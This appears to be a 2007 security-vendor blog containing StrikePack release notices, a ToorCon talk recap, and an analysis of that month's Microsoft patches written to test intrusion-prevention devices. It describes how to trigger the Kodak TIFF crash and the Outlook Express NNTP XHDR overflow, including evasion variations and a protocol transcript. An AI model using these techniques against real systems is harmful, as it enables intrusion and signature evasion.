StrikePack 16508 Released

StrikePack 16508 is now available to BreakingPoint customers. This StrikePack adds nineteen new strikes covering nine new vulnerabilities.

StrikePack 16220 Released

StrikePack 16220 is now available to BreakingPoint customers. This release contains ten new strikes covering six new vulnerabilities.

ToorCon 9 and Context-keys

Late last night I returned from ToorCon 9 in San Diego. I was able to make it out on time without any objections from the raging fires, but others I know were not quite as lucky. Even though the conference was awesome and San Diego, as always, had beautiful weather, it's nice to be back in Austin. This year I spoke at ToorCon on the subject of context-keyed payload encoders. You can view both the slides and video at my personal website if you're so inclined. For an extensive review of ToorCon 9 and all of the talks I attended, please click-through to my personal blog.

Toorcon Wrap-Up

Now that all is said and done, Toorcon 9 was a smashing success! It was well stocked on great talks and good people and, of course, the after parties were wild fun.

There was a strong theme of automated exploitation this year. Three of the talks that I saw focused on the subject. First up is Jerome Athias, who impressed everyone with his presentation's 3D graphical cinema introduction and then impressed again with his toolkit (written in an IDE called WinDev) for writing exploit modules for the Metasploit Framework in only a minute or two.

Another great talk was given by Jason Medeiros. He started off describing his methodology for detecting different types of crashes and followed up with a cool demo. He had written "from scratch" a complete debugger and heap analyzer. His program took a custom fuzzer definition and a binary as input. A few moments later, his demo generated a C exploit for the stack overflow that his fuzzer had just found.

Then there's the talk given by Nathan Rittenhouse and Johnny Cache. Their talk was focused on Byakugan, a WinDbg plugin. Byakugan is filled with goodies, but the real show stopper was the 3d-accelerated heap visualization. Nathan also gave a demo of his new Ruby replacement for pydbg, which seems to be exactly what I have been looking for. This should be posted to http://noxusfiles.com/ soon. Thanks, Nathan!

StrikePack 15863 Released

StrikePack 15863 is now available to BreakingPoint customers. This release contains nine new strikes covering seven new vulnerabilities.

StrikePack 15557 Released

StrikePack 15557 is now available to BreakingPoint customers. This release contains 10 new strikes covering 3 new vulnerabilities.

October 2007 Microsoft Tuesday

Every Microsoft Tuesday is busy here at BreakingPoint Systems, with the entire Strike Team pouring over patches, looking at IDA disassemblies, pondering BinDiff graphs, and writing exploits. From early Tuesday morning we (and our scripts) are monitoring the Windows update site in order to get the patches and bug descriptions as soon as they become available. After that, a quick game of who's-got-what-bug, and we're off to the races.

The October 2007 Microsoft patches cover the following issues:

MS07-055
Vulnerability in Kodak Image Viewer Could Allow Remote Code Execution
References: CVE-2007-2217

The MS07-055 bulletin addresses an issue with Kodak Image Viewer in the mishandling of TIFF images. TIFF files begin with an 8 byte header which consists of byte-order indicator (bytes 0-1), the value 42 (bytes 2-3), and an offset in bytes of the first Image File Directory (IFD), which allows the IFD to be located anywhere in the file. An IFD consists of a count of the number of directory entries (2 bytes) followed by a sequence of 12-byte entries, followed by a 4-byte offset of the next IFD (or 0 if none). A valid TIFF file must contain at least one IFD.

The bug lies in the application's processing of a particular IFD entry, the BitsPerSample structure. The BitsPerSample structure consists of a 2-byte tag (258), a 2-byte type (3), a 4-byte count of values, and a 4-byte offset of where the values are located. To trigger the bug, set the offset to some arbitrary data, and as the file parser attempts to parse the values from the incorrect location, the application will crash. This crash is currently being investigated further by the BreakingPoint Strike Team in order to determine where the application crashes, and to develop a proof-of-concept exploit for the bug.

Here is an example TIFF file:	Here is the crash caught in windbg:

There are three important variations to consider with exploitation of this bug. First is the byte-ordering indicator in the TIFF header. Since TIFF files can come in both byte orders, it is important to test your inline security device's coverage for this bug using both big- and little-endian TIFF files containing the attack. Second is the IFD offset field. Modifying the IFD offset in the TIFF file can aid in evading detection by devices that expect the IFD to be located near the beginning of the TIFF file. Multiple IFD entries can also be chained by using the offset to the next IFD, which requires the inline security device to parse down the entire chain of IFD entries. And finally, with file format bugs such as this, an attacker can use multiple network protocols for getting the malicious file into a victim's network. BreakingPoint includes tests covering HTTP, SMTP, POP3, and IMAP4 for most file format bugs in our strikeset.

The BreakingPoint Strike Team performed independent testing of one inline security device after applying the vendor's security pack that included coverage for this bug, and found an interesting result. It appears that the signature for this bug lacks sufficient coverage for all the cases given above. We found that this particular inline security device only provides coverage for MS07-055 when all of the following conditions are met:

1. The transport is HTTP
2. The TIFF file is encoded using little-endian byte ordering
3. The IFD structure is located within the first 310 bytes of the file

Here is a graph showing the detection rate of this inline security device for the 8 strikes covering this particular bug:


What these results indicate is that 8 strikes were sent through the device, and 0 were detected. This indicates insufficient coverage for this vulnerability by this particular device.

Multiple strikes covering various transports and formats for this bug will be included in the StrikePack released on October 11, 2007

MS07-056
Security Update for Outlook Express and Windows Mail
References: CVE-2007-3897

The MS07-056 bulletin addresses an issue with the mishandling of NNTP server responses to the XHDR command. To exploit this bug, an attacker needs to cause the victim to browse an NNTP server under his control. The best way to do this is to employ HTTP redirection (either by sending an HTTP 301 header, or by meta-refreshing in the HTML, or similar), because this will require no user interaction beyond visiting the attacker-controlled page. The URL will look something like news://news.breakingpointsystems.com/alt.news.breakingpoint.

When Outlook Express interacts with a real NNTP server, the conversation between the client and server typically goes something like this like this:

		< Client Initiates Connection >
		Server: 200 NNTP Service 5.00.0984 Version: 5.0.2195.6702 Posting Allowed
		Client: MODE READER
		Server: 200 NNTP Service 5.00.0984 Version: 5.0.2195.6702 Posting Allowed
		Client: GROUP alt.news.breakingpoint
		Server: 211 1 1003 1265 alt.news.breakingpoint
		Client: XOVER 1003-1265
		Server: 224 Overview Information Follows
		Server: < Overview of group articles >
		< Client makes requests based on user input > 

In order to trigger this bug, we must get the client to issue the XHDR command. XHDR is similar to XOVER, except the client requests information about a specific header for a range of articles. A series of XHDR commands will request information about individual headers, including the From, Subject, Date, Message-ID, References, and Xrefs headers of all the articles in the group. So, how can we force Outlook Express to send the XHDR command to the server? The key is to send an error response to the XOVER command, causing the client to fall back to using XHDR.

The conversation between the client and our modified server goes like this:

		< Client Initiates Connection >
		Server: 200 NNTP Service 5.00.0984 Version: 5.0.2195.6702 Posting Allowed
		Client: MODE READER
		Server: 200 NNTP Service 5.00.0984 Version: 5.0.2195.6702 Posting Allowed
		Client: GROUP alt.news.breakingpoint
		Server: 211 1 1003 1265 alt.news.breakingpoint
		Client: XOVER 1003-1265
		Server: 500 Error
		Client: XHDR subject 1003-1265
		Server: < Overflow of article subject headers >
		< Client crashes > 

In response to the first XHDR command, an attacker should return more article headers than the client expects. The client expects to receive the number of articles the server told him about. After receiving the server reply, Outlook Express crashes, with what looks like heap corruption.



Coverage for this bug will be included in the StrikePack released on October 11, 2007

MS07-057
Cumulative Security Update for Internet Explorer
References: CVE-2007-3893, CVE-2007-3892, CVE-2007-1091, CVE-2007-3826

The MS07-057 bulletin addresses four vulnerabilities across multiple versions of Internet Explorer. Three of these vulnerabilities are related to address bar spoofing, through the use of the onUnload() and onBeforeUnload() javascript methods. These spoofing issues can be annoying, but present a low level of risk. A demonstration of one these flaws can be found on Michal Zalewski's IETrap3 page. The fourth issue is rated critical by Microsoft and allows arbitrary code execution. The Secunia advisory states the bug occurs when multiple file downloads queue at the same time. The BreakingPoint Strike Team is still working on this flaw and hope to reproduce it in time for the upcoming StrikePack.

MS07-058
Vulnerability in RPC Could Allow Denial of Service

The MS07-058 bulletin addresses a denial of service flaw in the RPCSS service. The Microsoft RPC Service (RPCSS) is vulnerable to a denial of service attack triggered during authentication. This can be caused by including invalid NTLMSSP inside of the DCERPC traffic. The result is a crash inside of rpcrt4.dll which terminates the RPCSS service and ultimately results in the reboot of the entire system. The BreakingPoint Strike Team is currently working on providing coverage for this vulnerability.

MS07-059
Vulnerability in Windows SharePoint Services Could Result in Elevation of Privilege

The MS07-059 bulletin addresses a cross-site scripting (XSS) vulnerability in the SharePoint service. This vulnerability can be used to hijack the session of another SharePoint user, if the attacker can convince the victim to access a specific URL after authenticating with the SharePoint server. We have reproduced this in-house and plan on including coverage for this flaw in the upcoming StrikePack.

MS07-060
Vulnerability in Microsoft Word Could Allow Remote Code Execution

The MS07-060 bulletin addresses a memory corruption vulnerability in Microsoft Word 2002. At this time, we have not been able to reproduce this flaw or locate an example exploit. As far as we can tell, most security vendors are using the same sample file to develop their signatures, and are not looking for the actual vulnerability.

StrikePack 15300 Released

StrikePack 15300 is now available to BreakingPoint customers. This release contains ten new strikes covering nine new vulnerabilities.